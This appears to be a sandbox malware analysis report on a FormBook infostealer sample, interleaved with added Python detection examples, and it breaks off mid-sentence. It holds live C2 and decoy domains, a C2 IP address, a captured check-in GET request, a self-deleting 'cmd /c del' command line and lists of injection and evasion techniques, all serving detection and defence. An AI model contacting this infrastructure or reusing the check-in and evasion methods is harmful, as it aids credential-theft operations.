
Windows Analysis Report
TU0kiz3mxz.exe

Overview

General Information

Sample name: TU0kiz3mxz.exe (renamed because the original name is a hash value)
Original sample name: 20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204.exe
Analysis ID: 1587624
MD5: 5bc818a30e4d9d8a6bb828767ca1bf2a
SHA1: b0ce6d58037a4f05cb31eeca7db4ad2c347bc358
SHA256: 20fdf7fbe573d9233084f2f338379815159e9c057a5b1189f8007d3ccf0e4204
Tags: exe, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • TU0kiz3mxz.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: 5BC818A30E4D9D8A6BB828767CA1BF2A)
    • TU0kiz3mxz.exe (PID: 6824 cmdline: "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: 5BC818A30E4D9D8A6BB828767CA1BF2A)
    • TU0kiz3mxz.exe (PID: 1148 cmdline: "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: 5BC818A30E4D9D8A6BB828767CA1BF2A)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • explorer.exe (PID: 3584 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • cmd.exe (PID: 7120 cmdline: /c del "C:\Users\user\Desktop\TU0kiz3mxz.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 6272 cmdline: C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 4336 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
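The process tree above is the behavioural core of this report: the sample starts two further copies of itself, one of those starts an explorer.exe, that explorer.exe starts a 32-bit explorer.exe from SysWOW64, and the SysWOW64 explorer.exe runs cmd.exe to delete the original file (WerFault.exe on PID 2580 is the crash noted under "One or more processes crash"). The following is an added example, not part of the Joe Sandbox report, that re-expresses that tree as process-creation events and runs three checks a detection engineer would write for it. PIDs, command lines and parent links are taken from the report's tree; the image paths of cmd.exe and conhost.exe are assumed, since the report lists only their MD5s.

```python
"""Added example (not part of the Joe Sandbox report): the report's process
tree as process-creation events, plus three checks over it. Parent links
follow the report's indentation; cmd.exe/conhost.exe image paths are assumed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Proc:
    pid: int
    ppid: Optional[int]
    image: str      # full path of the executable
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\TU0kiz3mxz.exe"

# Constructed from the report's tree; PIDs and command lines are the report's.
EVENTS: List[Proc] = [
    Proc(1928, None, SAMPLE, f'"{SAMPLE}"'),
    Proc(6824, 1928, SAMPLE, f'"{SAMPLE}"'),
    Proc(1148, 1928, SAMPLE, f'"{SAMPLE}"'),
    Proc(2580, 1148, r"C:\Windows\Explorer.EXE", r"C:\Windows\Explorer.EXE"),
    Proc(3584, 2580, r"C:\Windows\SysWOW64\explorer.exe", r'"C:\Windows\SysWOW64\explorer.exe"'),
    Proc(7120, 3584, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{SAMPLE}"'),  # image path assumed
    Proc(6952, 7120, r"C:\Windows\System32\conhost.exe",
         r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),               # image path assumed
    Proc(6272, 2580, r"C:\Windows\System32\WerFault.exe",
         r"C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648"),
    Proc(4336, None, r"C:\Windows\explorer.exe", "explorer.exe"),
]


def build_tree(events: List[Proc]) -> Dict[int, Proc]:
    return {p.pid: p for p in events}


def ancestors(p: Proc, procs: Dict[int, Proc]) -> List[Proc]:
    """Parent, grandparent, ... up to the root (nearest first); loop-safe."""
    chain: List[Proc] = []
    seen = set()
    while p.ppid is not None and p.ppid in procs and p.ppid not in seen:
        seen.add(p.ppid)
        p = procs[p.ppid]
        chain.append(p)
    return chain


def image_chain(pid: int, procs: Dict[int, Proc]) -> List[str]:
    """Image basenames from the process up to the root, for a readable alert."""
    p = procs[pid]
    return [q.image.rsplit("\\", 1)[-1] for q in [p] + ancestors(p, procs)]


DEL_RE = re.compile(r'/c\s+del\s+"?([^"]+?)"?\s*$', re.IGNORECASE)


def detect_self_delete(procs: Dict[int, Proc]) -> List[Tuple[int, int]]:
    """cmd.exe deleting the image of one of its own ancestors: (cmd pid, ancestor pid)."""
    hits = []
    for p in procs.values():
        if not p.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(p.cmdline)
        if not m:
            continue
        target = m.group(1).lower()
        for a in ancestors(p, procs):
            if a.image.lower() == target:
                hits.append((p.pid, a.pid))
                break
    return hits


def detect_wow64_explorer(procs: Dict[int, Proc]) -> List[int]:
    """The user shell is C:\\Windows\\explorer.exe; a SysWOW64 explorer.exe is not a shell."""
    return [p.pid for p in procs.values()
            if p.image.lower() == r"c:\windows\syswow64\explorer.exe"]


def detect_self_spawn(procs: Dict[int, Proc]) -> List[int]:
    """Children started from the same image path as their parent (typical of unpacking stubs)."""
    return [p.pid for p in procs.values()
            if p.ppid in procs and procs[p.ppid].image.lower() == p.image.lower()]
```

Running the three checks over the tree flags PIDs 6824 and 1148 (same image as parent), 3584 (SysWOW64 explorer.exe) and 7120 (cmd.exe deleting the image of its ancestor 1148). The self-delete check walks the ancestor chain rather than just the parent because the deletion is issued two hops away from the sample, by a process that is no longer named like it.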
{"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}
Source | Rule | Description | Author
00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x96629:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0xc4a49:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0xf1e69:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0xacf58:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xdb378:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x108798:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x9ad97:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0xc91b7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0xf65d7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0xa5c7f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      • 0xd409f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      • 0x1014bf:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x99ce0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x99f4a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc8100:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xc836a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xf5520:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xf578a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0xa5a7d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xd3e9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1012bd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0xa5569:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xd3989:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x100da9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0xa5b7f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xd3f9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1013bf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0xa5cf7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xd4117:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x101537:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x9a962:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xc8d82:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0xf61a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0xa8be1:$sqlite3step: 68 34 1C 7B E1
      • 0xa8cf4:$sqlite3step: 68 34 1C 7B E1
      • 0xd7001:$sqlite3step: 68 34 1C 7B E1
      • 0xd7114:$sqlite3step: 68 34 1C 7B E1
      • 0x104421:$sqlite3step: 68 34 1C 7B E1
      • 0x104534:$sqlite3step: 68 34 1C 7B E1
      • 0xa8c10:$sqlite3text: 68 38 2A 90 C5
      • 0xa8d35:$sqlite3text: 68 38 2A 90 C5
      • 0xd7030:$sqlite3text: 68 38 2A 90 C5
      • 0xd7155:$sqlite3text: 68 38 2A 90 C5
      • 0x104450:$sqlite3text: 68 38 2A 90 C5
      • 0x104575:$sqlite3text: 68 38 2A 90 C5
      • 0xa8c23:$sqlite3blob: 68 53 D8 7F 8C
      • 0xa8d4b:$sqlite3blob: 68 53 D8 7F 8C
      • 0xd7043:$sqlite3blob: 68 53 D8 7F 8C
      • 0xd716b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x104463:$sqlite3blob: 68 53 D8 7F 8C
      • 0x10458b:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author
3.2.TU0kiz3mxz.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.TU0kiz3mxz.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.TU0kiz3mxz.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
3.2.TU0kiz3mxz.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.TU0kiz3mxz.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
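The YARA listings above quote the raw byte strings that fired, with their offsets in the memory dump and in the unpacked PE. Some of those bytes are readable on their own: `03 C8 0F 31 2B C1 89 45 FC` is `add ecx,eax ; rdtsc ; sub eax,ecx ; mov [ebp-4],eax`, the RDTSC timing check listed under "Tries to detect virtualization through RDTSC time measurements"; `3C 30 50 4F 53 54 74 09 40` contains the ASCII bytes "POST"; and the three JPCERT strings are each a single `push imm32` (opcode `68`) whose immediate is the constant FormBook uses in place of an API name, which is why a rule can match on the constant when the string "sqlite3_step" is nowhere in memory. The block below is an added example, not code from the report or from any of the rule authors: it re-applies those byte strings to a buffer constructed here and decodes the push immediates. The report does not quote the rules' conditions, so only per-string hits are reported, and the offsets are those of the constructed buffer, not the sandbox's dump.

```python
"""Added example (not from the Joe Sandbox report): re-apply the byte patterns
quoted in the report's YARA string listings to a buffer constructed here, and
decode the 'push imm32' constants. Rule conditions are not quoted in the
report, so this reports per-string hits only."""
import struct
from typing import Dict, List

# Byte sequences copied from the report's YARA string listings.
PATTERNS: Dict[str, bytes] = {
    # contains the ASCII bytes "POST" (50 4F 53 54)
    "Windows_Trojan_Formbook.$a1": bytes.fromhex("3C 30 50 4F 53 54 74 09 40"),
    "Windows_Trojan_Formbook.$a2": bytes.fromhex(
        "74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55"),
    # add ecx,eax ; rdtsc ; sub eax,ecx ; mov [ebp-4],eax  (RDTSC timing check)
    "Formbook_1.$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    # single 'push imm32' instructions; the JPCERT rule names them after sqlite3 APIs
    "Formbook.$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "Formbook.$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "Formbook.$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """Every offset at which needle occurs in buf (overlaps included)."""
    hits, start = [], 0
    while (i := buf.find(needle, start)) != -1:
        hits.append(i)
        start = i + 1
    return hits


def scan(buf: bytes) -> Dict[str, List[int]]:
    """Offsets of every pattern, keyed by rule.$string."""
    return {name: find_all(buf, pat) for name, pat in PATTERNS.items()}


def push_imm32(code: bytes) -> int:
    """Decode a 5-byte x86 'push imm32' (opcode 0x68) and return the immediate."""
    if len(code) != 5 or code[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", code[1:])[0]


def api_hash_constants() -> Dict[str, int]:
    """The immediates behind the three JPCERT strings (little-endian)."""
    return {name: push_imm32(pat) for name, pat in PATTERNS.items()
            if name.startswith("Formbook.$sqlite3")}


def build_sample_buffer() -> bytes:
    """Constructed 4 KiB buffer with four patterns planted at known offsets."""
    buf = bytearray(0x1000)
    plant = {
        0x020: PATTERNS["Windows_Trojan_Formbook.$a1"],
        0x100: PATTERNS["Formbook_1.$sequence_0"],
        0x200: PATTERNS["Formbook.$sqlite3step"],
        0x300: PATTERNS["Formbook.$sqlite3step"],
    }
    for off, pat in plant.items():
        buf[off:off + len(pat)] = pat
    return bytes(buf)


def report(buf: bytes) -> List[str]:
    """Hit lines in the same '0xOFFSET:$name' style the report uses."""
    return [f"0x{off:x}:{name.split('.', 1)[1]}"
            for name, offs in scan(buf).items() for off in offs]
```

Against a real dump you would replace `build_sample_buffer()` with the bytes of the `.sdmp` region and expect offsets like those listed above; the three immediates decode to 0xE17B1C34, 0xC5902A38 and 0x8C7FD853, which is what to search for if the rule itself is unavailable.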
          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T15:56:25.112677+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49868 | 13.248.169.48 | 80 | TCP


          AV Detection

Source: TU0kiz3mxz.exe, Avira: detected
Source: http://www.cleans.xyz/m25s/, Avira URL Cloud: Label: malware
Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.ehills.shop/m25s/"], "decoy": ["araghospitality.net", "cleans.xyz", "olnacasinotcs14.top", "pringhillinfos.net", "erkakasrumah.online", "orean-course-289113002.zone", "yeloma-treatment-82106.bond", "76iw543gw.autos", "nline-shopping-56055.bond", "enetik.xyz", "ax-th-6011838.fyi", "itygatehousing.app", "23zy998jk.bond", "pslag-hal-2.online", "uykoii.shop", "9supjub3p.buzz", "tmgl.bond", "actus-catering-creations.net", "ntercashspace24.homes", "ierra777.vip", "ental-health-69511.bond", "newordforpurpose.info", "roppsple.shop", "edant.ltd", "imitake.xyz", "ransportationmwmptpro.top", "roncrow.biz", "armanshop.xyz", "ealthy-life-products.online", "raphic-design-degree-33148.bond", "ildcraft.xyz", "16-lawn-care.today", "7732.club", "vitor.live", "uy-smart-tv-nl.today", "sone.best", "ellcli.net", "52006.club", "abelzshop.online", "cctofi.cpa", "alisu.xyz", "roformance.shop", "cskuvq.shop", "anforexuytin.cfd", "raceg.cyou", "rimevest-global.info", "ealthcare-trends-60670.bond", "oo.bio", "itodemo.click", "ottah.studio", "teamgame-mod.net", "39474.club", "yai11.top", "onnorbell.design", "dt5r.shop", "6874.club", "wistlnc.net", "ntermoney24cad.homes", "attoomasteracademy.online", "3win4.cyou", "xewaov.xyz", "6uzh.digital", "ransportationwlsltpro.top", "oches-a-credito-es.bond"]}
Source: TU0kiz3mxz.exe, Virustotal: Detection: 76%
Source: TU0kiz3mxz.exe, ReversingLabs: Detection: 91%
Source: Yara match, File source: 3.2.TU0kiz3mxz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.TU0kiz3mxz.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: TU0kiz3mxz.exe, Joe Sandbox ML: detected
Source: TU0kiz3mxz.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: TU0kiz3mxz.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: explorer.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdbSHA2568 source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TU0kiz3mxz.exe, TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdb source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe, Code function: 4x nop then pop ebx (3_2_00407B1B)
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 4x nop then pop ebx (5_2_02957B1B)

          Networking

Source: Network traffic, Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49868 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49868 -> 13.248.169.48:80
Source: Network traffic, Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49868 -> 13.248.169.48:80
Source: C:\Windows\explorer.exe, Network Connect: 13.248.169.48:80
Source: Malware configuration extractor, URLs: www.ehills.shop/m25s/
Source: DNS query: www.cleans.xyz
Source: unknown, DNS traffic detected: query: www.yeloma-treatment-82106.bond, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.oches-a-credito-es.bond, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.orean-course-289113002.zone, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.6874.club, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.araghospitality.net, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.cskuvq.shop, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.ehills.shop, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.olnacasinotcs14.top, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.raphic-design-degree-33148.bond, reply code: Name error (3, NXDOMAIN)
Source: unknown, DNS traffic detected: query: www.attoomasteracademy.online, reply code: Name error (3, NXDOMAIN)
Source: global traffic, HTTP traffic detected: GET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW HTTP/1.1, Host: www.cleans.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, ASN Name: AMAZON-02 (US)
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (12 occurrences)
Source: C:\Windows\explorer.exe, Code function: 4_2_0E90FF82 getaddrinfo, setsockopt, recv
Source: global traffic, HTTP traffic detected: GET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW HTTP/1.1, Host: www.cleans.xyz, Connection: close, Data Raw: 00 00 00 00 00 00 00
Source: global traffic, DNS query: www.orean-course-289113002.zone
Source: global traffic, DNS query: www.6874.club
Source: global traffic, DNS query: www.cleans.xyz
Source: global traffic, DNS query: api.msn.com
Source: global traffic, DNS query: www.oches-a-credito-es.bond
Source: global traffic, DNS query: www.yeloma-treatment-82106.bond
Source: global traffic, DNS query: www.araghospitality.net
Source: global traffic, DNS query: www.ehills.shop
Source: global traffic, DNS query: www.cskuvq.shop
Source: global traffic, DNS query: www.olnacasinotcs14.top
Source: global traffic, DNS query: www.attoomasteracademy.online
Source: global traffic, DNS query: www.raphic-design-degree-33148.bond
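Two things in the networking section are worth reading together with the extracted configuration. First, every domain the sandbox resolved is a "www." form of an entry in the config, and the decoys are queried exactly like the entry in "C2 list": in this run the listed C2 (www.ehills.shop) returned NXDOMAIN while the decoy www.cleans.xyz resolved to 13.248.169.48 and received the check-in, which is also the URL Avira's URL Cloud labelled. Second, the check-in itself is a GET to the config path /m25s/ with no User-Agent and two opaque query parameters, which is what the three ET Suricata rules fired on. The following is an added example, not part of the Joe Sandbox report: it loads a trimmed copy of the extracted config, classifies DNS replies against it, parses the captured request, and decides whether it has the check-in shape. The DNS events and the request are constructed from the values in the report; the event layout is this example's own, not a Joe 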